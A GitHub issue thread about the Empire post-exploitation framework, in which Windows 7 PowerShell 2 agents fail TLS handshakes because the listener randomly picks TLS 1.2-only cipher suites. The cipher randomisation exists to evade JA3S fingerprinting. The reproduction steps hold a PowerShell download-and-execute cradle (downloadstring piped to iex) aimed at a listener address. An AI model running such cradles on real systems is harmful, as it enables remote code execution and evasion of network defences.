[BUG]Powershell version 2 TLS Handshake failure #155

Closed
tyraniter opened this issue Apr 7, 2020 · 4 comments · Fixed by #163
Labels
bug Something isn't working confirmed

Comments


Empire Version

  • Empire 3.x

OS Information (Linux flavor, Python version)

  • OS: Ubuntu1804
  • Python: 2.7

Describe the bug
When using the PowerShell client on Windows 7, on which the default version of PowerShell and .NET is 2, to connect to an HTTPS listener, there will be a "HandShake Failure".

To Reproduce
Steps to reproduce the behavior:

  1. Start an HTTPS listener
  2. Run this script in a PowerShell terminal:

powershell -version 2
$a=new-object net.webclient;
$a.downloadstring('https://192.168.116.1:9999')|iex;

  3. See error

Expected behavior
By default, Windows 7 only supports TLS 1.0, and in lib/listeners/http.py most of the following cipher suites are only supported after TLS 1.2. If the random function returns a cipher suite which TLS 1.0 does not support, there is a "HandShake Failure".

cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384","ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)

This list was added in #27 for "randomized JA3S signature". The Python ssl.set_ciphers function can only be passed a string, not a list, as a parameter. Maybe we can use TLS 1.0 cipher suites only, for compatibility?

Screenshots
N/A

Additional context
N/A

@tyraniter tyraniter added the bug Something isn't working label Apr 7, 2020

tyraniter commented Apr 7, 2020

Maybe we can do like this:

cipherlist_1 = random.choice(["ECDHE-ECDSA-AES256-SHA","ECDHE-RSA-AES256-SHA"])
cipherlist_12 = random.choice(["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"])
context.set_ciphers(cipherlist_1+':'+cipherlist_12)
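
The single-pick selection quoted in the issue and the two-pick proposal above, checked against a TLS 1.0-only client, as an added example that is not Empire's code or part of the thread. The helper names and the `server_cert` parameter are assumptions: the page does not state the listener's certificate type, and an ECDHE-ECDSA suite is only selectable when the server holds an ECDSA certificate.

```python
# Added example, not Empire's code: which cipher strings leave a TLS 1.0
# client without a usable suite. Suite names are the ones quoted in the issue.
PAGE_CIPHERLIST = [
    "ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256",
    "ECDHE-RSA-AES256-SHA384", "ECDHE-RSA-AES256-SHA",
    "AES256-SHA256", "AES128-SHA256",
]
PROPOSED_TLS10 = ["ECDHE-ECDSA-AES256-SHA", "ECDHE-RSA-AES256-SHA"]
PROPOSED_TLS12 = [
    "ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256",
    "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256",
]


def tls12_only(suite):
    """GCM suites and suites with a SHA-256/SHA-384 MAC were introduced in TLS 1.2."""
    return "GCM" in suite or suite.endswith(("-SHA256", "-SHA384"))


def cert_type_needed(suite):
    """Key type the server certificate must have for this suite to be selectable."""
    return "ECDSA" if "-ECDSA-" in suite else "RSA"


def usable_by_tls10(cipher_string, server_cert="RSA"):
    """Suites in a colon-separated OpenSSL cipher string that a TLS 1.0 client
    could negotiate with a server holding a certificate of type server_cert
    (server_cert is an assumed parameter; the page does not give the type)."""
    return [s for s in cipher_string.split(":")
            if s and not tls12_only(s) and cert_type_needed(s) == server_cert]


def failing_strings(cipher_strings, server_cert="RSA"):
    """Cipher strings for which a TLS 1.0 handshake has no common suite."""
    return [c for c in cipher_strings if not usable_by_tls10(c, server_cert)]


def proposed_strings():
    """Every string the two-pick proposal can pass to set_ciphers()."""
    return [a + ":" + b for a in PROPOSED_TLS10 for b in PROPOSED_TLS12]


if __name__ == "__main__":
    print("single pick, fails for TLS 1.0:", failing_strings(PAGE_CIPHERLIST))
    print("two picks, fails for TLS 1.0 (RSA cert):",
          failing_strings(proposed_strings()))
```

With an RSA certificate, the two-pick strings that start with `ECDHE-ECDSA-AES256-SHA` still give a TLS 1.0 client nothing to negotiate, so the TLS 1.0 pick has to match the certificate type.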

Hubbl3 commented Apr 7, 2020

@tyraniter that's a good idea. I will work on fixing this for the next bug fix release or you can submit a PR.

tyraniter commented Apr 9, 2020

> @tyraniter that's a good idea. I will work on fixing this for the next bug fix release or you can submit a PR.

I will submit a PR

Cx01N commented Apr 14, 2020

Fix added to v3.1.5
